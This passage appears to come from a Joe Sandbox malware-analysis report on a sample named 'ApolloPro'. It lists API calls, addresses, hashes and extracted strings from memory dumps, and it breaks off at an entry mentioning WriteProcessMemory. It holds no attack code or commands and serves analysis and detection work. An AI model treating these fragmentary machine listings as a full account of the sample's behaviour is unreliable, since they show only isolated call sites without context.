                                                                                              • Opcode Fuzzy Hash: f57b063f9b7e48f546153bd196e8ff098bc101f3a9a23d608aa6cd2dc46fb687
                                                                                              • Instruction Fuzzy Hash: 6F216575A00104DFD754EF65DD85A6ABBFAEF49311F048469F94A97352CA70AC01CF90
                                                                                              APIs
                                                                                              • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00631729
                                                                                              • SelectObject.GDI32(?,00000000), ref: 00631738
                                                                                              • BeginPath.GDI32(?), ref: 0063174F
                                                                                              • SelectObject.GDI32(?,00000000), ref: 00631778
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: ObjectSelect$BeginCreatePath
                                                                                              • String ID:
                                                                                              • API String ID: 3225163088-0
                                                                                              • Opcode ID: e90484212e2e90957bd70dedee7e04424377852022081ee7a8137ff651d76575
                                                                                              • Instruction ID: 558d62f16c3a64f85e9bee6cff39eaebe911bcd740f8818b3d26f647828e51db
                                                                                              • Opcode Fuzzy Hash: e90484212e2e90957bd70dedee7e04424377852022081ee7a8137ff651d76575
                                                                                              • Instruction Fuzzy Hash: 1F218330A14208EFDB109F64DD49BB97BBBFB02351F185226F8259A2A0D7719996CFD0
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memcmp
                                                                                              • String ID:
                                                                                              • API String ID: 2931989736-0
                                                                                              • Opcode ID: c1f2d8144c31f30a3fb9de765f42f838b63deaf575956c0dd7db6b9ecfde5636
                                                                                              • Instruction ID: fecaf670f52eeacebf179cfc70ae616be3814169cd107fd86a139e3c8a7ad72b
                                                                                              • Opcode Fuzzy Hash: c1f2d8144c31f30a3fb9de765f42f838b63deaf575956c0dd7db6b9ecfde5636
                                                                                              • Instruction Fuzzy Hash: AD01F5E2A801153BD20072109C82FFB7B1FDA613A4F04822DFE069A741E770EE1583F5
                                                                                              APIs
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00695075
                                                                                              • __beginthreadex.LIBCMT ref: 00695093
                                                                                              • MessageBoxW.USER32(?,?,?,?), ref: 006950A8
                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 006950BE
                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 006950C5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                                                              • String ID:
                                                                                              • API String ID: 3824534824-0
                                                                                              • Opcode ID: 3ec86ea0ad2ac4ea15af29e0be2a4ada1ac74b39fc11dd525556bc1cb0d1f030
                                                                                              • Instruction ID: 671d76537521a2f75e4f09a9908855c0ba9c10646be26e6132f8543d3cd1fb87
                                                                                              • Opcode Fuzzy Hash: 3ec86ea0ad2ac4ea15af29e0be2a4ada1ac74b39fc11dd525556bc1cb0d1f030
                                                                                              • Instruction Fuzzy Hash: D0110876908748BFDB018FAC9C04AEF7BAEEB45320F144256F815D3360D6719A4487F0
                                                                                              APIs
                                                                                              • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00688E3C
                                                                                              • GetLastError.KERNEL32(?,00688900,?,?,?), ref: 00688E46
                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,00688900,?,?,?), ref: 00688E55
                                                                                              • HeapAlloc.KERNEL32(00000000,?,00688900,?,?,?), ref: 00688E5C
                                                                                              • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00688E73
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                              • String ID:
                                                                                              • API String ID: 842720411-0
                                                                                              • Opcode ID: 00ea8e3dc56daa9bf28bdd474dba76e36b5e6ee196501152c103e4a335a987c0
                                                                                              • Instruction ID: dbfe64cf2d20e827473c62a076781a5fc7a27c44dffad7a6662fce41ab3c1810
                                                                                              • Opcode Fuzzy Hash: 00ea8e3dc56daa9bf28bdd474dba76e36b5e6ee196501152c103e4a335a987c0
                                                                                              • Instruction Fuzzy Hash: EB011D71641204FFEB205FA6DC4CDBB7BAEEF89755B540669F849C3220DA319C10DB60
                                                                                              APIs
                                                                                              • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0069581B
                                                                                              • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00695829
                                                                                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00695831
                                                                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0069583B
                                                                                              • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00695877
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                              • String ID:
                                                                                              • API String ID: 2833360925-0
                                                                                              • Opcode ID: 1e5ce51262680ab1baf51b2adc973272c74ecc08b14c195b88c691b080423dba
                                                                                              • Instruction ID: 1e17bc28d113d55a5eec00c555c9928c322bad09465c3d070831c63f78ad03e6
                                                                                              • Opcode Fuzzy Hash: 1e5ce51262680ab1baf51b2adc973272c74ecc08b14c195b88c691b080423dba
                                                                                              • Instruction Fuzzy Hash: CF012971D01A2DDBDF019FE9EA499EDBBBEFB08711F014556E502F2640DB309550CBA1
                                                                                              APIs
                                                                                              • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00687C62,80070057,?,?,?,00688073), ref: 00687D45
                                                                                              • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00687C62,80070057,?,?), ref: 00687D60
                                                                                              • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00687C62,80070057,?,?), ref: 00687D6E
                                                                                              • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00687C62,80070057,?), ref: 00687D7E
                                                                                              • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00687C62,80070057,?,?), ref: 00687D8A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                              • String ID:
                                                                                              • API String ID: 3897988419-0
                                                                                              • Opcode ID: b125b17ecbab7bea5af5d588577a3f30942a5c2a36c479622c0c4418cf7f9ee1
                                                                                              • Instruction ID: c3cd305d69dc13c424c5a8b7c42b40649356e2b7473f92b168ed17953d83dcea
                                                                                              • Opcode Fuzzy Hash: b125b17ecbab7bea5af5d588577a3f30942a5c2a36c479622c0c4418cf7f9ee1
                                                                                              • Instruction Fuzzy Hash: FD015A72606214EBEB115F54DC44BBABBAEEF48792F249124F908D6210D771ED409BA0
                                                                                              APIs
                                                                                              • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00688CDE
                                                                                              • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00688CE8
                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00688CF7
                                                                                              • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00688CFE
                                                                                              • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00688D14
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                              • String ID:
                                                                                              • API String ID: 44706859-0
                                                                                              • Opcode ID: 662192ce1ee281c62400ca8012595ad3720e9bfdf7cec15c2bbde6d670aaaab2
                                                                                              • Instruction ID: f0b01defefc1d2d0e521b93e522a87591110e8e3ece6ff02430c58decfbfdae2
                                                                                              • Opcode Fuzzy Hash: 662192ce1ee281c62400ca8012595ad3720e9bfdf7cec15c2bbde6d670aaaab2
                                                                                              • Instruction Fuzzy Hash: 21F0A934200208AFEB101FE5DC88EBB3BAEFF89754F505229F904C3290CB60AC41DB60
                                                                                              APIs
                                                                                              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00688D3F
                                                                                              • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00688D49
                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00688D58
                                                                                              • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00688D5F
                                                                                              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00688D75
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                              • String ID:
                                                                                              • API String ID: 44706859-0
                                                                                              • Opcode ID: 721248721dcc9c4c9f8501e1cf439ee6718d3e39adf2c80ad75c5409f7e825b8
                                                                                              • Instruction ID: 42f04653f6196f58bfe189541f33addb351586caeb7a1d447635f60707dec471
                                                                                              • Opcode Fuzzy Hash: 721248721dcc9c4c9f8501e1cf439ee6718d3e39adf2c80ad75c5409f7e825b8
                                                                                              • Instruction Fuzzy Hash: 11F04F31240204EFEB111FA9EC88FB73BAEEF89755F541615F945C7290CB619D41DB60
                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 0068CD90
                                                                                              • GetWindowTextW.USER32(00000000,?,00000100), ref: 0068CDA7
                                                                                              • MessageBeep.USER32(00000000), ref: 0068CDBF
                                                                                              • KillTimer.USER32(?,0000040A), ref: 0068CDDB
                                                                                              • EndDialog.USER32(?,00000001), ref: 0068CDF5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                              • String ID:
                                                                                              • API String ID: 3741023627-0
                                                                                              • Opcode ID: b7bfc3921552ee8dbcc4dd4849ed564d3392608ecd27e8b3e0ec23d1b262d490
                                                                                              • Instruction ID: d2b3a0617232002c74171f807b8dfde19e7876570ddb11a646513629cc647cdd
                                                                                              • Opcode Fuzzy Hash: b7bfc3921552ee8dbcc4dd4849ed564d3392608ecd27e8b3e0ec23d1b262d490
                                                                                              • Instruction Fuzzy Hash: DB016D30504708ABFB217F61DD4EFA67BBAFF00715F001669A582A11E1DBF0A994CBA0
                                                                                              APIs
                                                                                              • EndPath.GDI32(?), ref: 0063179B
                                                                                              • StrokeAndFillPath.GDI32(?,?,0066BBC9,00000000,?), ref: 006317B7
                                                                                              • SelectObject.GDI32(?,00000000), ref: 006317CA
                                                                                              • DeleteObject.GDI32 ref: 006317DD
                                                                                              • StrokePath.GDI32(?), ref: 006317F8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                              • String ID:
                                                                                              • API String ID: 2625713937-0
                                                                                              • Opcode ID: f8db6125c253a89d4a1d5cf70c9ecca498591f270d6c52a80517475c98638e16
                                                                                              • Instruction ID: 93c5fc79f85440898ea3cdd219612e6cff256d609b11f941c6eb2aaa5778ce5c
                                                                                              • Opcode Fuzzy Hash: f8db6125c253a89d4a1d5cf70c9ecca498591f270d6c52a80517475c98638e16
                                                                                              • Instruction Fuzzy Hash: E3F0C930118208EBEB115F25EC4CB793BB7A7023A6F18A224E479592F0C7314AA5DF51
                                                                                              APIs
                                                                                              • CoInitialize.OLE32(00000000), ref: 0069CA75
                                                                                              • CoCreateInstance.OLE32(006C3D3C,00000000,00000001,006C3BAC,?), ref: 0069CA8D
                                                                                                • Part of subcall function 00641A36: _memmove.LIBCMT ref: 00641A77
                                                                                              • CoUninitialize.OLE32 ref: 0069CCFA
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                                              • String ID: .lnk
                                                                                              • API String ID: 2683427295-24824748
                                                                                              • Opcode ID: ae36a3c71bc6ebe857f907f9061e7927ef3148a92e3a6ff8438400219e4bddc8
                                                                                              • Instruction ID: ac7b2acfdd100c30e621dc6d8b53a5010f55f4a41ae171cbe4b95721bba4033b
                                                                                              • Opcode Fuzzy Hash: ae36a3c71bc6ebe857f907f9061e7927ef3148a92e3a6ff8438400219e4bddc8
                                                                                              • Instruction Fuzzy Hash: FEA15A71504205AFD340EF64D881EABB7EEEF95314F00491CF1569B2A2EB70EE49CB96
                                                                                              APIs
                                                                                                • Part of subcall function 00650FE6: std::exception::exception.LIBCMT ref: 0065101C
                                                                                                • Part of subcall function 00650FE6: __CxxThrowException@8.LIBCMT ref: 00651031
                                                                                                • Part of subcall function 00641A36: _memmove.LIBCMT ref: 00641A77
                                                                                                • Part of subcall function 00641680: _memmove.LIBCMT ref: 006416DB
                                                                                              • __swprintf.LIBCMT ref: 0063E598
                                                                                              Strings
                                                                                              • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0063E431
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                                              • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                              • API String ID: 1943609520-557222456
                                                                                              • Opcode ID: f2f595718fe79497186fcbd52dac5a7cbaefbbff4c37502513a461ed0bd39c4b
                                                                                              • Instruction ID: a1435ff29d4ed2d9eb809990a064501a9830303a9b276f38c20c3c92db4d80d0
                                                                                              • Opcode Fuzzy Hash: f2f595718fe79497186fcbd52dac5a7cbaefbbff4c37502513a461ed0bd39c4b
                                                                                              • Instruction Fuzzy Hash: A391D1715043019FC754EF24C886CAEB7A6EF86310F00491DF8869B2E1EB71EE45CBA6
                                                                                              APIs
                                                                                              • __startOneArgErrorHandling.LIBCMT ref: 006552CD
                                                                                                • Part of subcall function 00660320: __87except.LIBCMT ref: 0066035B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorHandling__87except__start
                                                                                              • String ID: pow
                                                                                              • API String ID: 2905807303-2276729525
                                                                                              • Opcode ID: 7395ee49059b63869588a2f0717dda27e52f8fb55cf071b742682028ffcc2183
                                                                                              • Instruction ID: 909136242e24fcf95e036c794b7b955f6426beab5840d00513fcdb5acb8ba090
                                                                                              • Opcode Fuzzy Hash: 7395ee49059b63869588a2f0717dda27e52f8fb55cf071b742682028ffcc2183
                                                                                              • Instruction Fuzzy Hash: 3E516621A09602C7EB21B714C9653BB2BD39B40752F30487CE8C6863A9FF748DD99B46
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: #$+
                                                                                              • API String ID: 0-2552117581
                                                                                              • Opcode ID: 284c326e0cbe20f6354d57e9adaed1ba7adab80dd7d55af988efc2fb954c07dd
                                                                                              • Instruction ID: fa66cb070c9e7150c5e8a3bf0a9dac9472f75036fc7ecebaa15ff02b91364b62
                                                                                              • Opcode Fuzzy Hash: 284c326e0cbe20f6354d57e9adaed1ba7adab80dd7d55af988efc2fb954c07dd
                                                                                              • Instruction Fuzzy Hash: 885112B5500255DFEB25EF28C880AFA7BA2EF5A310F144159FC969B390C734EC86CB61
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memmove$_free
                                                                                              • String ID: #Vd
                                                                                              • API String ID: 2620147621-1668578872
                                                                                              • Opcode ID: 2ae0daca18b78697a90b3bb4ea88e3af27880279f75c4e61f5216f3f7d2ec20e
                                                                                              • Instruction ID: 95bab6ebc099ee6d967d4757b771d983a96df2bac4290286374e710196ada35b
                                                                                              • Opcode Fuzzy Hash: 2ae0daca18b78697a90b3bb4ea88e3af27880279f75c4e61f5216f3f7d2ec20e
                                                                                              • Instruction Fuzzy Hash: 2D513B71A047418FDB64CF28C591B6FBBE2BF85314F14492DE98A87391E732D805CB92
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memset$_memmove
                                                                                              • String ID: ERCP
                                                                                              • API String ID: 2532777613-1384759551
                                                                                              • Opcode ID: c0e76ac6e3f99205ea49755ce74a8518be90a05daed85d890668cfe3b0bfbe37
                                                                                              • Instruction ID: c1d0ed3505c847007757b8d833f98e417051bfe6eb6821d5fc20de0bb737cb3b
                                                                                              • Opcode Fuzzy Hash: c0e76ac6e3f99205ea49755ce74a8518be90a05daed85d890668cfe3b0bfbe37
                                                                                              • Instruction Fuzzy Hash: 5251B371D003099FDB24DF65C885BEABBEAEF04714F14856EE84ADB351E7309586CB40
                                                                                              APIs
                                                                                                • Part of subcall function 00691CBB: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00689E4E,?,?,00000034,00000800,?,00000034), ref: 00691CE5
